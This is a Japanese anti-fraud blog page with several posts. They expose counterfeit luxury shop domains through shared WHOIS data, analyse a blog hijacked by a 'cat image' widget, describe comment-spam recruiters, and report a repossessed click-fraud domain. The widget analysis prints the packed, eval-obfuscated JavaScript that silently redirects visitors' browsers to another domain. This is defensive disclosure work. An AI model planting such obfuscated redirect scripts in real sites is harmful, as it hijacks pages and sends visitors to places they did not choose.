ここから本文です
☆女の徒然草☆
徒然なるままに、おんなもすなるブラというものをおとこもしてみんとてするなり

書庫ブログ詐欺対策

よろしく☆彡、初めまして★、お宝動画などの経済産業省通達違反行為(通称・ネット詐欺)に関する情報と対策です。

http://c.statcounter.com/4440886/0/1c5b0b72/0/
http://x4.yokinihakarae.com/bin/ll?058371302   アダルト業者によるコメントはIDを削除させていただきます
アクセス解析
http://b.hatena.ne.jp/entry/image/http://blogs.yahoo.co.jp/yoshimy_s/folder/503495.html
記事検索
検索
https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/89/16428989/img_1?1344636633
https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/72/11814372/img_0?1301538305
(要約)
中国の詐欺ショップが、大挙してYahoo!ブログへ進入しているのを見つけました。
今後、見つけ次第にカスタマーサービスへ違反報告しますので、ご承知おき下さい。

http://c.statcounter.com/4440886/0/1c5b0b72/0/ 

閲覧者接続情報 http://www.robtex.com/ipinfo.gif


中国の詐欺ショップが、大挙してYahoo!ブログへ進入しているのを見つけました。

発見した中国の詐欺ショップは、全部で8サイトあります。
そのうち4サイトは日本語のページとして作成されていて、
すでに一部はYahoo!ブログへ進入しています。

残りの4サイトは英語版でアメリカ向けの詐欺のようです。

これらのサイトは、すべて同じメールアドレスで登録してあることから判明しました。


最初に日本語で作成され、日本人向けの詐欺と思われる4サイトです。
こちらについては、サイトのドメイン、会社概要ページのイメージと
ドメイン登録情報を掲載します。


www.bpluxury.com

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/18/20206418/img_0?1437525986
◆サムネールを見る
ドメイン名:BPLUXURY.COM
Whois サーバー:whois.hostmonster.com
更新日:2015-05-27T07:59:33Z
作成日:2015-05-27T07:59:33Z
登録満了日:2016-05-27T07:59:33Z
レジストラ:FastDomain Inc.

[ドメイン登録者]
ID:
氏名:WANG PENGFEI
街区名:HOUZHAIBEIZHANYIQU78
都市名:YIWU
郵便番号:322000
国名:CHINA
電話番号:+1.3484069077
メールアドレス:85005730@163.COM


www.vvluxury.com

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/18/20206418/img_1?1437525986
◆サムネールを見る
ドメイン名:VVLUXURY.COM
Whois サーバー:whois.hostmonster.com
更新日:2015-05-28T03:15:04Z
作成日:2015-05-28T03:15:04Z
登録満了日:2016-05-28T03:15:04Z
レジストラ:FastDomain Inc.

[ドメイン登録者]
氏名:WANG PENGFEI
街区名:HOUZHAIJIEDAOBEIZHANYIQU78
都市名:YIWU
郵便番号:322000
国名:CHINA
電話番号:+1.3484069077
メールアドレス:85005730@163.COM


www.glluxury.com

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/18/20206418/img_2?1437525986
◆サムネールを見る
ドメイン名:GLLUXURY.COM
Whois サーバー:whois.hostmonster.com
更新日:2015-05-27T07:53:27Z
作成日:2015-05-27T07:53:27Z
登録満了日:2016-05-27T07:53:27Z
レジストラ:FastDomain Inc.

[ドメイン登録者]
氏名:WANG PENGFEI
街区名:HOUZHAIBEIZHANYIQU78
都市名:YIWU
郵便番号:322000
国名:CHINA
電話番号:+1.3484069077
メールアドレス:85005730@163.COM


www.jbluxury.com

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/18/20206418/img_3?1437525986
◆サムネールを見る
ドメイン名:JBLUXURY.COM
Whois サーバー:whois.hostmonster.com
更新日:2015-05-27T07:39:33Z
作成日:2015-05-27T07:39:33Z
登録満了日:2016-05-27T07:39:33Z
レジストラ:FastDomain Inc.

[ドメイン登録者]
氏名:WANG PENGFEI
街区名:BEIZHANYIQU 78ZHUANG
都市名:YIWU
郵便番号:322000
国名:CHINA
電話番号:+1.3484069077
メールアドレス:85005730@163.COM







残りの4サイトは英語版のページです。
そのままYahoo!ブログで宣伝することはないと思われます。
そのためサイトのドメイン名とページイメージを示すに留めておきます。


www.cheeluxury.com

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/18/20206418/img_4?1437525986
◆サムネールを見る


www.baoluxury.com

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/18/20206418/img_5?1437525986
◆サムネールを見る


www.leeluxury.com

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/18/20206418/img_6?1437525986
◆サムネールを見る


www.yunluxury.com

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/18/20206418/img_7?1437525986
◆サムネールを見る







今後、見つけ次第にカスタマーサービスへ違反報告します。

Yahoo!さんにおかれましては、上記サイトへのリンクに関する違反報告を受けたら
該当するブログの削除で対応して頂きたく存じます。



開くトラックバック(1)

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/89/16428989/img_1?1344636633
https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/72/11814372/img_0?1301538305
(要約)
とある忍者ブログが乗っ取られて、ブロガーさんが困っているとの情報を頂きました。
調べてみると、たしかに今はパーキングされているドメインページへ移動します。
さらに詳しく調べたら、ブログパーツ『猫画像』が原因のようでした。
なお、スクリプトタイプのブログパーツですので、Yahoo!ブログでの被害はないと思います。

http://c.statcounter.com/4440886/0/1c5b0b72/0/ 

閲覧者接続情報 http://www.robtex.com/ipinfo.gif


とある忍者ブログが乗っ取られて、ブロガーさんが困っているとの情報を頂きました。

調べてみると、たしかに今はパーキングされているドメインページへ移動します。


乗っ取られた忍者ブログ

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/41/20087141/img_0_m?1433584870
◆サムネールを見る



さらに詳しく調べると、このようなスクリプトを見付けました。
<div class="PluginContents left">
<script src="http://cat.1on1battle.com/battle/blog_parts_tag"></script>
<noscript><a href="http://cat.1on1battle.com/">猫画像</a></noscript>


試しにスクリプトアドレスのソースコードを調べると、やはりJSを利用して自動移動させています。

ヘッダ−
HTTP/1.1 200 OK
Content-Length: 457
Content-Type: application/x-javascript
Content-Location: http://cat.1on1battle.com/battle/blog_parts_tag/index.js
Last-Modified: Fri, 31 Oct 2014 16:40:50 GMT

ソースコード
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('0="3://4.1-2.5/";8.9.6.7=0;',10,10,'JavaScriptRedirectURL|kyushu|journal|http|www|net|location|href|window|top'.split('|'),0,{}))

JavaScriptRedirectURLの後に続く部分に移動先のアドレスが埋め込まれています。


そのため、今はドメインパーキングされているwww.kyushu-journal.netへ自動移動しているのです。

スクリプトのヘッダ−には、2014年10月31日の日付があります。
一方、2014年12月9日の記事までは正常動作していたようですが、
2015年4月14日の記事では、『ブログが乗っ取られてる…。』と悲鳴を上げていました。


ブログが乗っ取られてる…。

 http://www.kyushu-journal.net/に!

 借りてるとこに問い合わせしたけど、

 たらい回しであかん…。
( 2015/04/14(火) 22:45:49 )


どの時点で異変が起きたのかはっきりしませんが、少なくともブログパーツによってブログを乗っ取られる事態に陥ったことは間違いありません。



一体、ブログパーツ『猫画像』がどんなブログパーツだったのか、今では知る由もありません。

ブログの機能としてブログパーツを無効化した状態でメンテナンスができるのであれば、ブログパーツを取り外すだけで解決するでしょう。

しかし、メンテナンス画面でブログパーツも機能してしまうようでは回復不可能です。



幸いなことに、このブログパーツはスクリプトタイプでした。
Yahoo!ブログのメニューにはブログパーツを組み込めませんし、記事での利用も困難なためにYahoo!ブログでの被害はないものと思います。



ところで、誰が配布していたブログパーツだったのか気になるところですが、Whoisでは現在のドメインオーナーしか調べることができませんが、現在の所有者は中国になっていました。


Domain Name: 1on1battle.com

Registry Domain ID: 1836718717_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.22.cn
Registrar URL:  http://www.22.cn
Updated Date: 2013-11-25T01:11:49Z
Creation Date: 2013-11-25T01:11:49Z
Expiration Date: 2015-11-25T01:11:49Z
Registrar: Hangzhou Aiming Network Co.,Ltd

Registrant Name: wangziteng 
Registrant Organization: wangsongping
Registrant Street: hubeishengxiangfanshixiangchengqutanxilu2haofu96hao
Registrant City: xiangfan
Registrant State/Province: hubei
Registrant Postal Code: 441022
Registrant Country: CN
Registrant Phone: +86.710.3576382
Registrant Fax: +86.710.3576382
Registrant Email: 9498585@qq.com


それにしてもスクリプトタイプのブログパーツは、長期的に安定して運営されるサイトのもの以外、絶対に信用できないことになりますね。。。



https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/89/16428989/img_1?1344636633
https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/72/11814372/img_0?1301538305
(要約)
どこからやって来るのか定かでなかったので、ほとんど記事にしませんでしたが
やっとカモがメールアドレス背負ってやって来ました。

http://c.statcounter.com/4440886/0/1c5b0b72/0/ 

閲覧者接続情報 http://www.robtex.com/ipinfo.gif



どこからやって来るのか定かでなかったので、ほとんど記事にしませんでしたが・・・


やっとカモがメールアドレス背負ってやって来ました。





ニックネームのリンク先を開くとブログ未開設となっています。




しかし、そのページにはブログプロフィールページへのリンクがありますから、ブログプロフィールのサムネールを取得できました。




この勧誘はYahoo!でのIDやソフトバンクのメールアドレスを転々と変えながら
かなり長期間に渡って続いています。

そのため判別としては文面の内容に頼るしかないですけど、
ほとんどが身に覚えのない内容ですし、「ありがとうございました!」と書きながら「コメントするのにだいぶ迷った」と書くなど、一貫性が見られないことからも判別できるものと思います。





なお・・・

ブログが未開設でもブログプロフィールだけは存在しています。

携帯版の場合は、ブログプロフィールページがありませんから閲覧はできません。
その代わり、アドレスにはYahoo!ID、またはニックネームのIDが含まれています

http://blogs.mobile.yahoo.co.jp/p/blog/common/noblog?yid=yuup0q95yt51


パソコン版、スマフォ版は表示名に付いているアドレスも共通ですが、
以前のプロフィールページと同じで暗号化されたIDが使われています

http://blogs.yahoo.co.jp/FRONT/noblog.html?id=aPdn3kIobrOsAUXwWUBmblE-


そのリンクを開けば、ブログプロフィールページへ移動します。

http://blogs.yahoo.co.jp/PROFILE/klo2dKQobrOsFwerZa1d3YeN8Wk-


この関係さえ判明すれば、IDと暗号化IDの変換もできそうですが、やたらと手間が掛かりますね。




https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/89/16428989/img_1?1344636633
https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/72/11814372/img_0?1301538305
(要約)
去年1年間に、全国の税関が偽ブランド品やコピー商品として
国内への輸入を差し止めた件数は、これまでで最も多くなりました。
増えた理由の一つはインターネットの通信販売が拡大していることです。
残念な事に、Yahoo!ブログでも偽ブランド品、コピー商品の宣伝が行われています。
春節で休んでいたサイトの勧誘ブログが今日から復活しています。

http://c.statcounter.com/4440886/0/1c5b0b72/0/ 

閲覧者接続情報 http://www.robtex.com/ipinfo.gif


去年1年間に、全国の税関が偽ブランド品やコピー商品として
国内への輸入を差し止めた件数は、これまでで最も多くなりました。

増えた理由の一つはインターネットの通信販売が拡大していることです。


偽ブランド品輸入差し止め ネット通販拡大で最多

去年1年間に、全国の税関が偽ブランド品やコピー商品として国内への輸入を差し止めた件数は、インターネットの通信販売が拡大していることからこれまでで最も多くなりました。
財務省によりますと、去年1年間に、全国の税関が偽ブランド品やコピー商品として輸入を差し止めた件数は、前の年と比べて14%増えて3万2060件に上り、昭和62年に統計を取り始めて以来、最も多くなりました。
押収した商品がすべて正規品だった場合、180億円相当になるということです。これは、インターネットの通信販売が拡大しているためで、ハンドバッグや財布、ブランドのロゴなどが入ったスマートフォンのケースなどが多く差し止められました。
また、去年は、ブラジルでサッカーワールドカップが開かれたこともあり、日本代表のユニフォームのコピー商品なども摘発されました。こうした偽ブランド品やコピー商品は、中国から持ち込まれるケースが依然として全体の9割以上を占めるとういうことで、財務省では中国の税関当局と連携しながら取締りを強化したいとしています。
( 2015/03/04(水) 14:23:49 )





残念な事に、Yahoo!ブログでも偽ブランド品、コピー商品の宣伝が行われています。
春節で休んでいたサイトの勧誘ブログが今日から復活しています。








インターネットでは実物を見ることができないため、
偽ブランドやコピー商品を見抜くのは困難ですが、次の方法で確認してください。

  1. サイトのページにウソが書かれていないか、
  2. 海外からの直送になっていないか、
  3. どこかのサイトページのコピーになっていないか、
  4. サイトのWhois(登録情報)にウソがないか、
  5. Whoisにプライバシープロテクトが行われていないか

などを確認することで、ある程度は見破れます。


偽ブランド品やコピー商品を国内への輸入すると税関で差し止めとなりますし、
量が多ければ事情聴取されることもあります。

くれぐれも、海外サイトの偽ブランド品やコピー商品には注意してくださいね。



https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/89/16428989/img_1?1344636633
https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/72/11814372/img_0?1301538305
(要約)
クリック詐欺サイトのドメイン cyclamen1209.info は、
日本時間で14日午前5時ごろ、レジストラ Wild West Domains の管理下に置かれました。
このままでは再開できませんので、逮捕されていなければ新しいドメインに移動するはずです。

http://c.statcounter.com/4440886/0/1c5b0b72/0/ 



クリック詐欺サイトのドメイン cyclamen1209.info は、
日本時間で14日午前5時ごろ、レジストラ Wild West Domains の管理下に置かれました。



ドメイン登録情報 cyclamen1209.info

Domain Name:CYCLAMEN1209.INFO
Domain ID: D54187315-LRMS
Creation Date: 2014-12-09T06:59:47Z
Updated Date: 2014-12-13T20:27:01Z
Registry Expiry Date: 2015-12-09T06:59:47Z

Sponsoring Registrar:Wild West Domains, LLC (R213-LRMS)
Sponsoring Registrar IANA ID: 440
WHOIS Server: whois.wildwestdomains.com
Referral URL: http://www.wildwestdomains.com
Domain Status: clientDeleteProhibited
Domain Status: clientRenewProhibited
Domain Status: clientTransferProhibited
Domain Status: clientUpdateProhibited
Domain Status: serverTransferProhibited

Registrant ID:CR182850818
Registrant Name:Repossessed by Wild West Domains
Registrant Organization:Repossessed by Wild West Domains
Registrant Street: 14455 N Hayden Rd
Registrant Street: Suite 219
Registrant City:Scottsdale
Registrant State/Province:AZ
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4805058800
Registrant Phone Ext: 
Registrant Fax: +1.4805058844
Registrant Fax Ext: 
Registrant Email:repossesseddomain@wildwestdomains.com

Admin ID:CR182850820
Admin Name:Repossessed by Wild West Domains
Admin Organization:Repossessed by Wild West Domains
Admin Street: 14455 N Hayden Rd
Admin Street: Suite 219
Admin City:Scottsdale
Admin State/Province:AZ
Admin Postal Code:85260
Admin Country:US
Admin Phone:+1.4805058800
Admin Phone Ext: 
Admin Fax: +1.4805058844
Admin Fax Ext: 
Admin Email:repossesseddomain@wildwestdomains.com

Billing ID:CR182850821
Billing Name:Repossessed by Wild West omains
Billing Organization:Repossessed by Wild West Domains
Billing Street: 14455 N Hayden Rd
Billing Street: Suite 219
Billing City:Scottsdale
Billing State/Province:AZ
Billing Postal Code:85260
Billing Country:US
Billing Phone:+1.4805058800
Billing Phone Ext: 
Billing Fax: +1.4805058844
Billing Fax Ext: 
Billing Email:repossesseddomain@wildwestdomains.com

Tech ID:CR182850819
Tech Name:Repossessed by Wild West Domains
Tech Organization:Repossessed by Wild West Domains
Tech Street: 14455 N Hayden Rd
Tech Street: Suite 219
Tech City:Scottsdale
Tech State/Province:AZ
Tech Postal Code:85260
Tech Country:US
Tech Phone:+1.4805058800
Tech Phone Ext: 
Tech Fax: +1.4805058844
Tech Fax Ext: 

Tech Email:repossesseddomain@wildwestdomains.com
Name Server:NS09.DOMAINCONTROL.COM
Name Server:NS10.DOMAINCONTROL.COM
DNSSEC:Unsigned

そのため14日(日)以降はYahoo!トラベルにも現れることができなかったようです。

このままでは再開できませんので、逮捕されていなければ新しいドメインに移動するはずです。



アバター
よっしみ〜☆
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について

ブログバナー

1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30

スマートフォンで見る

モバイル版Yahoo!ブログにアクセス!

スマートフォン版Yahoo!ブログにアクセス!

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

話題の新商品が今だけもらえる!
ジュレームアミノ シュープリーム
プレゼントキャンペーン
ふるさと納税サイト『さとふる』
実質2000円で特産品がお手元に
11/30までキャンペーン実施中!

その他のキャンペーン

みんなの更新記事